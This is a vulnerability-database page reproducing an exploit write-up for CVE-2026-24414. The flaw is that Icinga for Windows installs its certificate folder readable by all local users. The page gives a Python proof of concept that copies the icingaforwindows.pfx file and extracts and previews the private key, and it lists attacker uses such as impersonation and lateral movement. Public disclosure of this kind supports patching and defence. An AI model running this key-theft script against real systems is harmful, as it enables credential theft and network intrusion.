Vulners
Lucene search
📄 Icinga for Windows 1.13.3 Private Key Exposure
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2026-24414 | 29 Jan 202617:35 | – | attackerkb |
 | CVE-2026-24414 | 29 Jan 202621:01 | – | circl |
 | Icinga PowerShell Framework security vulnerabilities | 29 Jan 202600:00 | – | cnnvd |
 | CVE-2026-24414 | 29 Jan 202617:35 | – | cve |
 | CVE-2026-24414 Icinga for Windows certificate can have too-open permissions | 29 Jan 202617:35 | – | cvelist |
 | EUVD-2026-4963 | 29 Jan 202617:35 | – | euvd |
 | CVE-2026-24414 | 29 Jan 202618:16 | – | nvd |
 | CVE-2026-24414 Icinga for Windows certificate can have too-open permissions | 29 Jan 202617:35 | – | osv |
 | 📄 Icinga for Windows 1.13.3 Private Key Disclosure | 25 Feb 202600:00 | – | packetstorm |
 | PT-2026-5318 | 29 Jan 202600:00 | – | ptsecurity |
10
# Exploit Title: Icinga for Windows 1.13.3 - Incorrect Default Permissions
Private Key Exposure
# Date: 2026-02-23
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://icinga.com/
# Software Link:
https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3
# Version: Icinga PowerShell Framework < 1.13.4, < 1.12.4, < 1.11.2
# Tested on: Windows 11 25H2
# CVE: CVE-2026-24414
## Description
Icinga for Windows PowerShell Framework versions prior to 1.13.4, 1.12.4,
and 1.11.2 install the certificate directory with insecure default
permissions. The directory `C:\Program
Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate` is
created with `BUILTIN\Users:(RX)` permissions, allowing ANY local user to
read the `icingaforwindows.pfx` certificate file containing the private key.
This vulnerability leads to complete exposure of the Icinga private key,
enabling attackers to:
- Impersonate the monitored host
- Decrypt Icinga monitoring traffic
- Use the certificate for authentication to other systems
- Perform lateral movement within the network
## Proof of Concept
The following Python exploit demonstrates that any standard user can read
and extract the private key:
```python
#!/usr/bin/env python3
"""
CVE-2026-24414 - Icinga for Windows Private Key Exposure
Exploit Author: nu11secur1ty
Tested on: Windows 11 25H2
"""
import os
import re
import shutil
import getpass
from pathlib import Path
from datetime import datetime
# Target path
cert_file = Path(r"C:\Program
Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate\icingaforwindows.pfx")
def main():
print("[*] CVE-2026-24414 Exploit - Icinga Private Key Exposure")
print(f"[*] Running as: {getpass.getuser()}")
print("-" * 60)
# Check if target exists
if not cert_file.exists():
print("[-] Target certificate not found")
return
print(f"[+] Found certificate: {cert_file}")
print(f"[+] File size: {cert_file.stat().st_size} bytes")
# Check permissions (visual confirmation)
os.system(f'icacls "{cert_file.parent}"')
# Create output directory
output_dir = Path.cwd() /
f"icinga_exposed_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
output_dir.mkdir(exist_ok=True)
# Copy certificate
shutil.copy2(cert_file, output_dir / "original_certificate.pfx")
print(f"[+] Certificate copied to: {output_dir /
'original_certificate.pfx'}")
# Try to extract private key
with open(cert_file, 'rb') as f:
data = f.read()
# Look for PEM private key
try:
text_data = data.decode('utf-8', errors='ignore')
pattern = r'-----BEGIN.*PRIVATE KEY-----.*?-----END.*PRIVATE
KEY-----'
keys = re.findall(pattern, text_data, re.DOTALL)
if keys:
for i, key in enumerate(keys, 1):
key_file = output_dir / f"private_key_{i}.key"
with open(key_file, 'w') as kf:
kf.write(key)
print(f"[+] Private key extracted: {key_file}")
print(f"[+] Key preview:\n{key[:200]}...")
else:
print("[!] No PEM key found - certificate may be binary")
print(f"[+] Raw certificate saved for analysis")
except:
print("[!] Binary certificate saved - may contain private key in
DER format")
print("\n" + "="*60)
print("[!] VULNERABILITY CONFIRMED!")
print("[!] ANY local user can read this private key")
print("[!] CVE-2026-24414 - Incorrect Default Permissions")
print("="*60)
# Show dangerous permissions
print("\n[!] CRITICAL: Check the permissions above")
print("[!] Look for: BUILTIN\\Users:(I)(RX) - THIS IS THE
VULNERABILITY")
# Create proof file
proof = output_dir / "PROOF.txt"
with open(proof, 'w') as f:
f.write(f"CVE-2026-24414 Exploit Success\n")
f.write(f"Date: {datetime.now()}\n")
f.write(f"User: {getpass.getuser()}\n")
f.write(f"Certificate: {cert_file}\n")
f.write("Private Key: EXTRACTED\n")
f.write("Impact: ANY local user can steal this key\n")
print(f"\n[+] Proof file created: {proof}")
if __name__ == "__main__":
main()
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 46.8
EPSS0.00004
SSVC